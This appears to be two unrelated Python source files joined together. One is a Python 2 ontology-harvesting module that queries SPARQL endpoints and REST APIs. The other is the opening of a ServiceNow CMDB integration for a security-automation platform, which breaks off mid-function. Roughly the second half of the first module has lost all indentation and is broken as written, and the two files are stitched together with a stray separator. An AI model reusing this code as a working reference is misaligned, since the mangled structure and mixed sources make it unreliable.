    return out
def fillMockSparqlResultObjectWithCollectionItemInfo(coll_item=None, pids=None, res=None):
    """Append binding(s) for one API collection item to a mock SPARQL
    result `res`.

    Two passes over each {var: json_key} map in `pids`: the first
    collects scalar (string) values into a single binding; the second
    expands list values, appending one binding copy per list item.
    Values may come from the item itself or from its "links" dict.
    Returns the mutated result, or None on failure.
    """
    out = None
    try:
        if coll_item and pids and res:
            if isinstance(coll_item, dict) and isinstance(pids, tuple) and isinstance(res, dict):
                binding = {}
                for p in pids:
                    if isinstance(p, dict):
                        # Pass 1: scalar values fill the base binding.
                        for k in p.keys():
                            if k:
                                fld_ctnt = None
                                if p[k] in coll_item.keys():
                                    fld_ctnt = coll_item[p[k]]
                                elif "links" in coll_item.keys() and isinstance(coll_item["links"], dict) and p[k] in coll_item["links"].keys():
                                    fld_ctnt = coll_item["links"][p[k]]
                                if fld_ctnt:
                                    if isinstance(fld_ctnt, (str, unicode)):
                                        if k not in res["head"]["vars"]: res["head"]["vars"].append(unicode(k))
                                        # URIs get SPARQL type 'uri',
                                        # everything else typed-literal.
                                        if k == "uris" or k == "ontology_iri":
                                            binding[unicode(k)] = {u'type': u'uri', u'value': unicode(fld_ctnt)}
                                        else:
                                            binding[unicode(k)] = {u'type': u'typed-literal', u'value': unicode(fld_ctnt)}
                        # Pass 2: list values emit one binding copy per
                        # item, overwriting var k each time.
                        for k in p.keys():
                            if k:
                                fld_ctnt = None
                                if p[k] in coll_item.keys():
                                    fld_ctnt = coll_item[p[k]]
                                elif "links" in coll_item.keys() and isinstance(coll_item["links"], dict) and \
                                        p[k] in coll_item["links"].keys():
                                    fld_ctnt = coll_item["links"][p[k]]
                                if fld_ctnt:
                                    if isinstance(fld_ctnt, list):
                                        for item in fld_ctnt:
                                            if isinstance(item, (str, unicode)):
                                                if k not in res["head"]["vars"]: res["head"]["vars"].append(unicode(k))
                                                binding[unicode(k)] = {u'type': u'typed-literal', u'value': unicode(item)}
                                                res["results"]["bindings"].append(copy.deepcopy(binding))
                # Ensure the base binding itself is present once.
                if binding and binding not in res["results"]["bindings"]: res["results"]["bindings"].append(binding)
                out = res
    except:
        print "Could not fill mock SPARQL result object with collection item information."
    return out
def makeMockSparqlResultFromAPIclassCollection(props, pids):
    """Build a SPARQL-JSON-shaped result from one API "collection"
    page (`props`), mapping fields per `pids`.

    Returns the mock result dict, or None on failure.
    """
    out = None
    try:
        if props and pids:
            if isinstance(props, dict) and isinstance(pids, tuple):
                if "collection" in props.keys():
                    if isinstance(props["collection"], list):
                        # Empty skeleton mimicking a SPARQL JSON reply.
                        res = {u'head': {u'link': [], u'vars': []}, u'results': {u'distinct': False, u'bindings': [], u'ordered': True}}
                        for coll_item in props["collection"]:
                            if isinstance(coll_item, dict) and isinstance(pids, tuple) and isinstance(res, dict):
                                res = fillMockSparqlResultObjectWithCollectionItemInfo( coll_item, pids, res )
                        out = res
    except:
        print "Could not make mock SPARQL result from API class collection."
    return out
def apiGatherPropertySetValuesFromAllClasses(from_uri=None, apikey=None, pids=None):
    """Harvest all classes of an ontology through its REST API.

    Pages through `from_uri`/classes (1000 per page) using either the
    API's "pageCount" or "nextPage" pagination, converts each page to
    a mock SPARQL result, enriches it with ontology metadata and
    accumulates OntologyClass dicts. Returns the accumulated list, or
    None on failure.
    """
    out = None
    try:
        if from_uri and apikey and pids:
            if isinstance(from_uri, str) and isinstance(apikey, str) and isinstance(pids, tuple):
                rpp = 1000
                props = None
                props = get_json( from_uri + "/classes?pagesize=" + str(rpp), apikey )
                if props and isinstance(props, dict):
                    container = []
                    if "pageCount" in props.keys():
                        # Pagination style 1: total page count known.
                        pageCount = props["pageCount"]
                        start = time.time()
                        for curr_page in range(pageCount):
                            props = None
                            props = get_json( from_uri + "/classes?pagesize=" + str(rpp) + "&page=" + str(curr_page+1), apikey )
                            res = makeMockSparqlResultFromAPIclassCollection(props, pids)
                            res = addOntoMetadataToMockSparql(res, pids, apikey)
                            page_container = None
                            page_container = buildOntoClassContainer(res)
                            if page_container: container += page_container
                            print "Processing page", str(curr_page+1) + "/" + str(pageCount), "using pageCount method.", \
                                len(container), "in", time.time()-start, "s"
                    elif "nextPage" in props.keys():
                        # Pagination style 2: follow "nextPage" links.
                        nextPage = True
                        while nextPage:
                            #print "Processing page", nextPage, "using nextPage method."
                            nextPage = False
                            nextPage = props["nextPage"]
                            res = makeMockSparqlResultFromAPIclassCollection(props, pids)
                            res = addOntoMetadataToMockSparql(res, pids, apikey)
                            page_container = []
                            page_container = buildOntoClassContainer(res)
                            if page_container: container += page_container
                            props = None
                            if nextPage:
                                props = get_json( from_uri + "/classes?pagesize=" + str(rpp) + "&page=" + str(nextPage), apikey )
                    else:
                        # Single page: no pagination markers present.
                        res = makeMockSparqlResultFromAPIclassCollection(props, pids)
                        res = addOntoMetadataToMockSparql(res, pids, apikey)
                        container = buildOntoClassContainer(res)
                    out = container
    except:
        # NOTE(review): message typo — should read "Could not gather".
        print "Could gather set of properties from all API classes."
    return out
def repeatQueryInSmallerChunks(endpoint=None, pids=None, from_uri=None, apikey=None, endpoint_type=None):
    """Fallback harvest strategy for endpoints that reject the full
    property query.

    Phase 1 probes the property set one entry at a time (LIMIT 1) to
    find the subset the endpoint can answer (`pids_works`). Phase 2
    then pages through results with an adaptive window: the LIMIT
    doubles after each non-empty page and halves after each failure,
    merging pages into `res_t`, until ten empty pages in a row or the
    success/attempt ratio degrades. "endpoint_nsws" endpoints are
    queried via urllib instead of the SPARQL wrapper. Returns the
    merged result, or None.
    """
    out = None
    try:
        if endpoint and pids:
            if isinstance(endpoint, str) and isinstance(pids, tuple):
                res_p = None
                res_t = dict()
                worksatall = False
                pids_test = tuple()
                pids_works = tuple()
                nsws = None
                if endpoint_type:
                    if isinstance(endpoint_type, (str, unicode)):
                        if endpoint_type == "endpoint_nsws":
                            nsws = True
                # Phase 1: probe each property individually.
                for p in pids:
                    if isinstance(p, dict):
                        p_test = {}
                        p_works = {}
                        pids_test += (p_test,)
                        pids_works += (p_works,)
                        for k in p.keys():
                            if isinstance(p[k], (str, unicode)):
                                p_test[k] = p[k]
                                query = makeQueryForPropertyValues( pids_test )
                                if from_uri and not nsws:
                                    if isinstance(from_uri, str):
                                        query = modifyQueryForSubgraph( query, from_uri )
                                query = modifyQueryAddLimitAndOffset(query, 1)
                                query = query[:query.find("LIMIT")] + "ORDER BY ?id\n" + query[query.find("LIMIT"):]
                                res_p = None
                                if nsws:
                                    res_p = urllibOneEndpoint( endpoint, query, from_uri, apikey )
                                else:
                                    res_p = sparqlOneEndpoint( endpoint, query, apikey )
                                if res_p:
                                    worksatall = True
                                    p_works[k] = p[k]
                                else:
                                    # Roll back to the last working set.
                                    p_test = {z:p_works[z] for z in p_works.keys()}
                        if not worksatall: break
                if res_p: res_t = res_p
                # Phase 2: page through with adaptive LIMIT/OFFSET.
                if worksatall:
                    bind_empty = 0
                    attempts = 1
                    successes = 1
                    offset = 1
                    limit = 2
                    while bind_empty<10 and successes>0 and successes>attempts/10:
                        attempts += 1
                        query = makeQueryForPropertyValues( pids_works )
                        if from_uri and not nsws:
                            if isinstance(from_uri, str):
                                query = modifyQueryForSubgraph( query, from_uri )
                        query = modifyQueryAddLimitAndOffset(query, limit, offset)
                        query = query[:query.find("LIMIT")] + "ORDER BY ?id\n" + query[query.find("LIMIT"):]
                        try:
                            res_c = None
                            if nsws:
                                res_c = urllibOneEndpoint( endpoint, query, from_uri, apikey )
                            else:
                                res_c = sparqlOneEndpoint( endpoint, query, apikey )
                            if res_c:
                                successes += 1
                                offset = offset + limit
                                if isinstance(res_c, dict):
                                    if "results" in res_c.keys():
                                        if isinstance(res_c["results"], dict):
                                            if "bindings" in res_c["results"].keys():
                                                if isinstance(res_c["results"]["bindings"], list):
                                                    if len(res_c["results"]["bindings"]) > 0:
                                                        res_t = mergeQueryResults(res_t, res_c)
                                                        bind_empty = 0
                                                        # Grow the window on success.
                                                        limit = limit * 2
                                                    else:
                                                        bind_empty += 1
                            else:
                                # Shrink the window on failure.
                                limit = max(1, int(limit/2))
                        except:
                            limit = max(1, int(limit/2))
                            pass
                if res_t: out = res_t
    except:
        print "Could not repeat query in smaller chunks."
    return out
def sparqlGatherPropertySetvaluesFromAllClasses( endpoint=None, pids=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
if endpoint and pids:
if isinstance( endpoint, str ) and isinstance( pids, tuple ):
res = None
query = makeQueryForPropertyValues(pids)
if endpoint_type:
if isinstance(endpoint_type, (str, unicode)):
if endpoint_type == "endpoint_nsws":
res = urllibOneEndpoint(endpoint, query, from_uri, apikey)
if not res:
if checkEndpointResponds( endpoint, from_uri, apikey ):
if from_uri:
if isinstance( from_uri, str ):
query = modifyQueryForSubgraph( query, from_uri )
res = sparqlOneEndpoint( endpoint, query, apikey )
if not res: res = repeatQueryInSmallerChunks( endpoint, pids, from_uri, apikey, endpoint_type )
out = buildOntoClassContainer( res )
except:
print "Could not gather set of properties from all sparql endpoint classes."
return out
def repeatPropQueryWithDecreasingLimit( endpoint=None, query=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
if endpoint and query:
if inputStringCheck(endpoint) and inputStringCheck(query):
res = None
sws = None
if endpoint_type:
if isinstance(endpoint_type, (str, unicode)):
if endpoint_type == "endpoint_nsws":
res = urllibOneEndpoint(endpoint, query, from_uri, apikey)
if not res:
sws = checkEndpointResponds(endpoint, from_uri, apikey)
if sws:
if from_uri:
if inputStringCheck(from_uri):
query = modifyQueryForSubgraph( query, from_uri )
res = sparqlOneEndpoint( endpoint, query, apikey )
#print res
if not res:
pred_count = None
pred_count = obtainPredicateCount( endpoint, from_uri, apikey, endpoint_type )
if pred_count:
offset = 0
limit = max(1, int(pred_count/2))
while offset < pred_count and limit>0:
print "processing:", offset, "+", limit
if limit < 1: limit = 1
if offset + limit > pred_count:
limit = pred_count - offset + 1
q = modifyQueryAddLimitAndOffset( query, limit, offset )
q = q[:q.find("LIMIT")] + "\nORDER BY ?oo\n" + q[q.find("LIMIT"):]
print q
r = None
if sws:
r = sparqlOneEndpoint( endpoint, q, apikey )
else:
r = urllibOneEndpoint( endpoint, q, from_uri, apikey )
if r:
if res:
res = mergeQueryResults( res, r )
else:
res = r
offset += limit
else:
if limit <= 1:
break
limit = max(1, int(limit/2))
out = res
except:
print "Could not repeat query with decreasing limit."
return out
def gatherPropIDsFromAPIendpoint( mandatory_prop_dict=None, optional_prop_dict=None, endpoint=None, from_uri=None, apikey=None ):
out = None
try:
if endpoint and from_uri and apikey:
if inputStringCheck(endpoint) and inputStringCheck(from_uri) and inputStringCheck(apikey):
if endpoint.lower() in from_uri.lower():
# Get the available resources
props = get_json( from_uri+"/properties/", apikey )
res = {u'head': {u'link': [], u'vars': [u'oo']},
u'results': {u'distinct': False, u'bindings': [], u'ordered': True}}
joined_prop_dict = mandatory_prop_dict
for k in optional_prop_dict.keys():
if k not in joined_prop_dict.keys():
joined_prop_dict[k] = optional_prop_dict[k]
for key, val in joined_prop_dict.iteritems(): # from data input (i.e. parameters)
if inputStringCheck(key):
if key not in res["head"]["vars"]:
res["head"]["vars"].append( unicode(key) )
if inputStringCheck(val):
for prop in props: # from API
if isinstance(prop, dict):
if "label" in prop.keys() and "id" in prop.keys():
if isinstance(prop["label"], (str,unicode)) and val.lower() in prop["label"].lower():
res["results"]["bindings"].append(\
{u'oo':{u'type': u'literal', u'value': unicode(prop["label"])},\
unicode(key):{u'type': u'uri', u'value': unicode(prop["id"])}})
elif isinstance(prop["label"], list):
for item in prop["label"]:
if isinstance(item, (str,unicode)) and val.lower() in item.lower():
res["results"]["bindings"].append(\
{u'oo':{u'type': u'literal', u'value': unicode(item)},\
unicode(key):{u'type': u'uri', u'value': unicode(prop["id"])}})
out = res
except:
print "Could not gather property IDs from API endpoint:", from_uri
return out
def obtainPropertyIDs( propsofi=None, endpoint=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
# e.g. {'label': ['chamallow', 'pref-label', 'preferred term', 'moule a gauffre', 'editor preferred term', 'prophylaxie', 'bercail', 'nonobstant']}
m_prop_dict = extractPropertiesOnRequiredStatus( propsofi, "mandatory" )
# e.g. {'syn': ['salicorne', 'bachibouzouk', 'synonym', 'dezinguee', 'alternative term', 'cabale']}
o_prop_dict = extractPropertiesOnRequiredStatus( propsofi, "optional" )
j=0
# for keeping only the first item in the list of terms standing as value at dictionary key "None"
# e.g. {'label': 'chamallow'}
mandatory_prop_dict = { k:m_prop_dict[k][j] for k in m_prop_dict.keys() if j<len(m_prop_dict[k]) }
# e.g. {'syn': 'salicorne'}
optional_prop_dict = { k:o_prop_dict[k][j] for k in o_prop_dict.keys() if j<len(o_prop_dict[k]) }
# for being able to store best string match results between current query results and previous ones
# we increase depth of dictionary entries by making these entries (sub-)dictionaries themselves.
# e.g. {'label': {'target': 'chamallow'}}
mandat_prop_dict = { k:{"target":mandatory_prop_dict[k]} for k in mandatory_prop_dict.keys() }
# e.g. {'syn': {'target': 'salicorne'}}
option_prop_dict = { k:{"target":optional_prop_dict[k]} for k in optional_prop_dict.keys() }
max_hook_nb = max([ len(o_prop_dict[k]) for k in o_prop_dict.keys() ])
# Interrupt before end of term list in case that for each term an exact property label match has been found and thus its ID stored.
while (j==0 or j<max_hook_nb) and (not allPropertyIDsIdentified( mandat_prop_dict ) or not allPropertyIDsIdentified( option_prop_dict )):
#print query
if endpoint:
if inputStringCheck(endpoint):
# retrieving from API
if endpoint_type and inputStringCheck(endpoint_type) and endpoint_type=='api':
res = gatherPropIDsFromAPIendpoint( mandatory_prop_dict, optional_prop_dict, endpoint, from_uri, apikey )
# retrieving from SPARQL endpoint
else:
query = makeQueryForPropertyIDs( mandatory_prop_dict, optional_prop_dict )
if endpoint_type and inputStringCheck(endpoint_type) and endpoint_type=='endpoint_nsws':
res = repeatPropQueryWithDecreasingLimit( endpoint, query, from_uri, apikey, endpoint_type )
else:
res = repeatPropQueryWithDecreasingLimit( endpoint, query, from_uri, apikey )
if res:
mandat_prop_dict = updateDictWithQueryResults( mandat_prop_dict, res )
option_prop_dict = updateDictWithQueryResults( option_prop_dict, res )
j += 1
# print "\n", j
#
# print mandat_prop_dict
#
# print option_prop_dict, "\n"
mandatory_prop_dict = { k:m_prop_dict[k][j] for k in m_prop_dict.keys() if j<len(m_prop_dict[k]) }
optional_prop_dict = { k:o_prop_dict[k][j] for k in o_prop_dict.keys() if j<len(o_prop_dict[k]) }
for k in mandatory_prop_dict.keys():
if k in mandat_prop_dict.keys():
mandat_prop_dict[k]["target"] = mandatory_prop_dict[k]
for k in optional_prop_dict.keys():
if k in optional_prop_dict.keys():
option_prop_dict[k]["target"] = optional_prop_dict[k]
mandat_prop_dict = keepBestLabelsWithPerfectMatch( mandat_prop_dict )
option_prop_dict = keepBestLabelsWithPerfectMatch( option_prop_dict )
if mandat_prop_dict or option_prop_dict:
out = ( mandat_prop_dict, option_prop_dict )
except:
print "Could not proceed with obtaining property IDs."
return out
def keepBestLabelsWithPerfectMatch( prop_dict ):
out = None
try:
p_dict = {}
for k in prop_dict.keys():
if prop_dict[k]:
if type(prop_dict[k]) is dict:
if "ID" and "match" in prop_dict[k].keys():
if prop_dict[k]["ID"] and prop_dict[k]["match"]:
if type(str(prop_dict[k]["ID"])) is str and type(prop_dict[k]["match"]) is float:
if prop_dict[k]["match"] == 1:
p_dict[k] = prop_dict[k]["ID"]
if p_dict != {}: out = p_dict
except:
print "Could not proceed with keeping prop_dict best_match_labels with perfect match."
return out
def updateDictWithQueryResults( prop_dict, query_res ):
out = None
try:
if prop_dict and query_res:
if type(prop_dict) is dict and type(query_res) is dict:
if "head" in query_res.keys():
if "vars" in query_res["head"]:
if "results" in query_res.keys():
if "bindings" in query_res["results"]:
for content in query_res["results"]["bindings"]:
for item in query_res["head"]["vars"]: # item = "oo", "label", "def" (sparql_var)
if item in content.keys():
if 'value' in content[item].keys():
if item in prop_dict.keys():
if type(prop_dict[item]) is dict:
if "ID" not in prop_dict[item].keys():
if "oo" in content.keys():
if 'value' in content["oo"].keys() and "target" in prop_dict[item].keys():
prop_dict[item]["ID"] = content[item]['value']
prop_dict[item]["best_match_label"] = content["oo"]['value']
prop_dict[item]["match"] = stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] )
elif "target" in prop_dict[item].keys() and "match" in prop_dict[item].keys() and "oo" in content.keys():
if 'value' in content["oo"].keys() and type(str(prop_dict[item]["target"])) is str and type(prop_dict[item]["match"]) is float:
if stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] ) > prop_dict[item]["match"]:
prop_dict[item]["ID"] = content[item]['value']
prop_dict[item]["best_match_label"] = content["oo"]['value']
prop_dict[item]["match"] = stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] )
out = prop_dict
except:
print "Could not update dictionary with query results."
return out
def allPropertyIDsIdentified( prop_dict ):
out = None
allIDs = True
try:
if prop_dict:
if type(prop_dict) is dict:
for item in prop_dict.keys():
if "ID" in prop_dict[item].keys() and "match" in prop_dict[item].keys():
if type(str(prop_dict[item]["ID"])) is str and type(prop_dict[item]["match"]) is float:
if prop_dict[item]["match"] < 1:
allIDs = False
break
else:
allIDs = False
else:
allIDs = False
out = allIDs
except:
print "Could not proceed with checking that all properties were identified."
return out
def switchKeysSparql2OntoClass(pids, propsofi):
out = None
try:
if pids and propsofi:
if isinstance(pids, tuple) and isinstance(propsofi, list):
new_pids = tuple()
for p in pids:
if isinstance(p, dict):
switched = {}
for key in p.keys():
if key and isinstance(key, (str, unicode)):
for prop in propsofi:
if isinstance(prop, dict):
if "output_name" and "sparql_var" in prop.keys():
if isinstance(prop["sparql_var"], (str, unicode)) and isinstance(prop["output_name"], (str, unicode)):
if prop["sparql_var"] == key:
switched[prop["output_name"]] = key
break
if switched:
new_pids += (switched,)
else:
new_pids += (p,)
out = new_pids
except:
print "Could not switch pids dict keys from sparql to onto_class attribute field name."
return out
def extractPropertiesOnRequiredStatus( propsofi=None, keyword=None ):
out = None
try:
if propsofi and keyword:
if type(propsofi) is list and type(keyword) is str:
out = {}
for prop in propsofi:
if "required_status" in prop.keys():
if prop["required_status"] == keyword:
if "sparql_var" in prop.keys():
if None in prop.keys():
for hook_str in prop[None]:
if prop["sparql_var"] in out.keys():
out[prop["sparql_var"]].append(hook_str)
else:
out[prop["sparql_var"]] = [hook_str]
except:
print "Could not extract properties based on keyword:", keyword
return out
def reformatpidsForAPIuse(pids=None, propsofi=None):
out = None
try:
if pids and propsofi:
if isinstance(propsofi, list) and isinstance(pids, tuple):
meta_pids = None
meta_pids = extractPropertiesOnRequiredStatus(propsofi, "automatic")
meta_pids = switchKeysSparql2OntoClass((meta_pids,), propsofi)
if meta_pids and isinstance(meta_pids, tuple) and len(meta_pids)==1:
meta_pids = meta_pids[0]
else:
meta_pids = None
pids_out = None
pids_out = switchKeysSparql2OntoClass(pids, propsofi)
if meta_pids and pids_out:
if isinstance(meta_pids, dict) and isinstance(pids_out, tuple):
for k in meta_pids.keys():
if isinstance(k, (str, unicode)) and isinstance(meta_pids[k], (str, unicode)):
if k and meta_pids[k]:
replaced = False
for p in pids_out:
if isinstance( p, dict ):
if k in p.keys():
p[k] = unicode(meta_pids[k])
replaced = True
break
if not replaced:
if len(pids_out)>0:
if isinstance( pids_out[1], dict ):
pids_out[1][k] = unicode(meta_pids[k])
else:
pids_out += ({k:unicode(meta_pids[k])},)
if pids_out: out = pids_out
except:
print "Could not reformat pids structure for API use."
return out
def makeQueryForPropertyIDs( mandatory_prop_dict=None, optional_prop_dict=None ):
out = None
try:
query = "SELECT DISTINCT ?oo"
if mandatory_prop_dict:
if type(mandatory_prop_dict) is dict:
for m in mandatory_prop_dict.keys():
if inputStringCheck( m ) and inputStringCheck(mandatory_prop_dict[m]):
query += " ?" + m
if optional_prop_dict:
if type(optional_prop_dict) is dict:
for o in optional_prop_dict.keys():
if inputStringCheck( o ) and inputStringCheck(optional_prop_dict[o]):
query += " ?" + o
query += "\nWHERE { \n"
allButFirst = False
if mandatory_prop_dict:
if type(mandatory_prop_dict) is dict:
for m in mandatory_prop_dict.keys():
if inputStringCheck( m ) and inputStringCheck( mandatory_prop_dict[m] ):
if allButFirst:
query += "UNION\n"
else:
allButFirst = True
query += " {\n"
query += " ?s ?" + m + " ?o .\n"
query += " ?" + m + " ?pp ?oo .\n"
#query += " FILTER(CONTAINS(LCASE(str(?oo)), LCASE('" + mandatory_prop_dict[m] + "')))\n"
# abremaud@esciencefactory.com, 20160209
# Problem:
# Query using REGEX not optimally efficient, orders of magnitude heavier burden
# on sparql engine server side compared to sparql native expressions such as CONTAINS.
# Sources:
# http://stackoverflow.com/questions/12353537/sparql-exact-match-regex
# http://www.cray.com/blog/dont-use-hammer-screw-nail-alternatives-regex-sparql/
#
# abremaud@esciencefactory.com, 20160310
# Back to original less performance oriented design due to Ontobee endpoint handling neither
# CONTAINS nor LCASE functionalities.
query += " FILTER REGEX(str(?oo), '" + mandatory_prop_dict[m] + "', 'i')\n"
query += " }\n"
# abremaud@esciencefactory.com, 20160212
# Could maybe catch predicates on perfect match to last portion of uri character sequence.
# query += "UNION\n"
# query += " {\n"
# query += " ?s ?" + m + " ?o .\n"
# query += " ?" + m + " ?pp ?oo .\n"
# query += " FILTER(STREND(LCASE(str(?" + m + ")), LCASE('" + mandatory_prop_dict[m] + "')))\n"
# query += " }\n"
if optional_prop_dict:
if type(optional_prop_dict) is dict:
for o in optional_prop_dict.keys():
if inputStringCheck( o ) and inputStringCheck( optional_prop_dict[o] ):
if allButFirst:
query += "UNION\n"
else:
allButFirst = True
query += " {\n"
query += " ?s ?" + o + " ?o .\n"
query += " ?" + o + " ?pp ?oo .\n"
#query += " FILTER(CONTAINS(LCASE(str(?oo)), LCASE('" + optional_prop_dict[o] + "')))\n"
# abremaud@esciencefactory.com, 20160209
# See above for an explanation.
query += " FILTER REGEX(str(?oo), '" + optional_prop_dict[o] + "', 'i')\n"
query += " }\n"
query += "}"
out = query
except:
print "Could not write down sparql query for property IDs."
return out
def makeQueryForPropertyValues( pids = None ):
out = None
try:
query = "SELECT DISTINCT ?id"
if pids:
if isinstance(pids, tuple) and len(pids)>0:
for p in pids:
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ):
query += " ?" + str(k)
query += "\nWHERE { \n"
if pids:
if isinstance(pids, tuple) and len(pids)>0:
p = pids[0]
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ) and inputStringCheck( str(p[k]) ):
query += " ?id <" + str(p[k]) +"> ?" + str(k) + " .\n"
if isinstance(pids, tuple) and len(pids)>1:
p = pids[1]
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ) and inputStringCheck( str(p[k]) ):
query += " OPTIONAL{ ?id <" + str(p[k]) +"> ?" + str(k) + " . }\n"
query += "}"
out = query
except:
print "Could not write down sparql query for property values."
return out
def sparqlLocalFile( filepath, query ):
out = None
g = Graph()
try:
g.parse( filepath, format=filepath[::-1][:filepath[::-1].find(".")][::-1] )
try:
out = g.query(query).serialize(format="json")
out = json.loads(out)
except:
print "Could not process formulated query on indicated file."
pass
except:
print "Could not parse indicated file:", filepath
pass
return out
def csv2list( filepath ):
out = None
try:
with open( filepath, 'rb' ) as csvfile:
temp = csv.DictReader( csvfile, fieldnames=None, restkey=None, restval='', dialect='excel', delimiter=';' )
out = []
for row in temp:
out.append( row )
except:
print "Could not load CSV file:", filepath
pass
return out
| |
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
'''IMPORTS'''
import urllib3
import traceback
from typing import Any, Dict, Tuple, List
from _collections import defaultdict
import ast
from operator import itemgetter
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
API_VERSION = '/api/now/cmdb/instance/'
CREAT_RECORD_DATA_FIELDS = ['attributes', 'inbound_relations', 'outbound_relations', 'source']
UPDATE_RECORD_DATA_FIELDS = ['attributes', 'source']
ADD_RELATION_DATA_FIELDS = ['inbound_relations', 'outbound_relations', 'source']
FIELD_TO_OUTPUT = {
'inbound_relations': 'Inbound Relations',
'outbound_relations': 'Outbound Relations'
}
class Client:
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
"""
def __init__(self, credentials: dict, use_oauth: bool = False, client_id: str = '', client_secret: str = '',
url: str = '', verify: bool = False, proxy: bool = False):
"""
Args:
- credentials: the username and password given by the user.
- client_id: the client id of the application of the user.
- client_secret - the client secret of the application of the user.
- url: the instance url of the user, i.e: https://<instance>.service-now.com.
NOTE - url should be given without an API specific suffix as it is also used for the OAuth process.
- insecure: Whether the request should verify the SSL certificate.
- proxy: Whether to run the integration using the system proxy.
- headers: The request headers, for example: {'Accept`: `application/json`}. Can be None.
- use_oauth: a flag indicating whether the user wants to use OAuth 2.0 or basic authorization.
"""
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
self.use_oauth = use_oauth
self.snow_client: ServiceNowClient = ServiceNowClient(credentials=credentials, use_oauth=use_oauth,
client_id=client_id, client_secret=client_secret,
url=url, verify=verify, proxy=proxy, headers=headers)
def records_list(self, class_name, params=None):
return self.snow_client.http_request(method='GET', url_suffix=f'{API_VERSION}{class_name}', params=params)
def get_record(self, class_name, sys_id, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}'
return self.snow_client.http_request(method='GET', url_suffix=url_suffix, params=params)
def create_record(self, class_name, data, params=None):
return self.snow_client.http_request(method='POST', url_suffix=f'{API_VERSION}{class_name}', params=params, data=data)
def update_record(self, class_name, sys_id, data, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}'
return self.snow_client.http_request(method='PATCH', url_suffix=url_suffix, params=params, data=data)
def add_relation(self, class_name, sys_id, data, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}/relation'
return self.snow_client.http_request(method='POST', url_suffix=url_suffix, params=params, data=data)
def delete_relation(self, class_name, sys_id, rel_sys_id, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}/relation/{rel_sys_id}'
return self.snow_client.http_request(method='DELETE', url_suffix=url_suffix, params=params)
''' HELPER FUNCTIONS '''
def create_request_data(data_fields: List, args: dict) -> dict:
"""
This function converts the input given by the user when creating a new record to a data dict that should be passed
in the http request.
Args:
data_fields: A list with the fields that should be added to the data.
args: The arguments that were filled by the user.
Returns:
A dictionary representing the data parameter that should be sent in the http request.
"""
data = {}
for field in data_fields:
if field == 'source':
data[field] = args.get(field)
elif field == 'attributes': # 'attributes' input should be of the form key1=value1,key2=value2...
val = args.get(field)
if val:
try:
attributes_dict = {}
attributes_input = val.split(',')
for attribute in attributes_input:
pair = attribute.split('=')
attributes_dict[pair[0]] = pair[1]
data[field] = attributes_dict
except Exception:
raise Exception('Illegal input. Input format should be "key=value". Multiple values can be filled, '
'separated by a comma.')
else: # other fields should be converted to dict/list
val = args.get(field)
if val:
try:
data[field] = ast.literal_eval(val)
except Exception:
raise Exception('Illegal input. Please see the argument description for the correct input format.')
return data
def create_record_context(class_name: str, sys_id: str, result: dict) -> dict:
"""
Create the context output for commands that operate on a single record.
Args:
class_name: The class name of the record used.
sys_id: The id of the record.
result: The raw response from the http request.
Return:
A dictionary representing the context output for the record.
"""
context = {
'ServiceNowCMDB.Record(val.ID===obj.ID)': {
'Class': class_name,
'SysID': sys_id,
'Attributes': result.get('attributes', {}),
'InboundRelations': result.get('inbound_relations', []),
'OutboundRelations': result.get('outbound_relations', []),
}
}
return context
def create_human_readable(title: str, result: dict, fields: str) -> str:
"""
Create the human readable output for commands.
Args:
title: The title of the human readable output.
result: The raw response from the http request consisting of the attributes, inbound_relations and
outbound_relations fields.
fields: A string representing all the fields of the record the client specified that should be returned. If no
fields were specified, only the record name and sys_id will be displayed in the war room.
Return:
A string representing the markdown output that should be displayed in the war room.
"""
md = f'{title}\n'
attributes_outputs = {}
if fields:
for field in fields.split(','):
if result.get('attributes', {}).get(field):
attributes_outputs[string_to_context_key(field)] = result.get('attributes', {}).get(field)
else:
attributes_outputs = {
'SysID': result.get('attributes', {}).get('sys_id'),
'Name': result.get('attributes', {}).get('name')
}
md += tableToMarkdown('Attributes', t=attributes_outputs, removeNull=True)
for relation_type in ['inbound_relations', 'outbound_relations']:
relations = result.get(relation_type)
if relations:
relation_output = {
'SysID': list(map(itemgetter('sys_id'), relations)),
'Target Display Value': list(
map(itemgetter('display_value'), list(map(itemgetter('target'), result.get(relation_type))))), # type: ignore
'Type Display Value': list(
map(itemgetter('display_value'), list(map(itemgetter('type'), result.get(relation_type))))), # type: ignore
}
md += f' {tableToMarkdown(FIELD_TO_OUTPUT.get(relation_type), t=relation_output)}'
return md
''' COMMAND FUNCTIONS '''
def records_list_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Query a CMDB table using the class name to receive all records in the class.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class')
params = {}
if args.get('query'):
params['sysparm_query'] = args.get('query')
if args.get('limit'):
params['sysparm_limit'] = args.get('limit')
if args.get('offset'):
params['sysparm_offset'] = args.get('offset')
outputs = {
'Class': class_name
}
response = client.records_list(class_name=class_name, params=params)
result = response.get('result', {})
if result:
outputs['Records'] = result
human_readable = tableToMarkdown(f'Found {len(result)} records for class {class_name}:', t=result)
else:
human_readable = f'Found no records for class {class_name}.'
context['ServiceNowCMDB(val.ID===obj.ID)'] = outputs
return human_readable, context, response
def get_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Query attributes and relationship information for a specific record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
